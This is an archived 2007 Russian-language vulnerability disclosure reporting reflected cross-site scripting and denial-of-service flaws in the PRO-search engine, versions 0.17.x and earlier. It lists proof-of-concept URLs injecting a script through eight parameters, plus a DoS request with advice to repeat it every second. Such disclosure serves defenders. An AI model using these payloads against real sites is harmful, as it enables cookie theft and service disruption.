Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18731
HistoryDec 26, 2007 - 12:00 a.m.

Vulnerabilities in PRO-search

2007-12-2600:00:00
vulners.com
3937

Здравствуйте 3APA3A!

Сообщаю вам о найденной мною Cross-Site Scripting и Denial of Service уязвимостях в PRO-search.

XSS:

Уязвимости на главной странице в параметрах prot, host, path, name, ext, size, search_days, show_page.

http://site/?prot=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/?host=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/?path=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/?name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/?ext=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/?size=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/?search_days=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/?show_page=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Denial of Service:

http://site/?show_page=20000&time=0

Поисковик ищет по всем файлам, что может привести к DoS (чем больше значение show_page, тем большая задержка сервера). DoS кратковременный, поэтому для проведения DoS атаки нужно регулярно (ежесекундно) посылать запрос к серверу.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/1259/

Уязвимы версии PRO-search 0.17.x и все предыдущие версии.

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua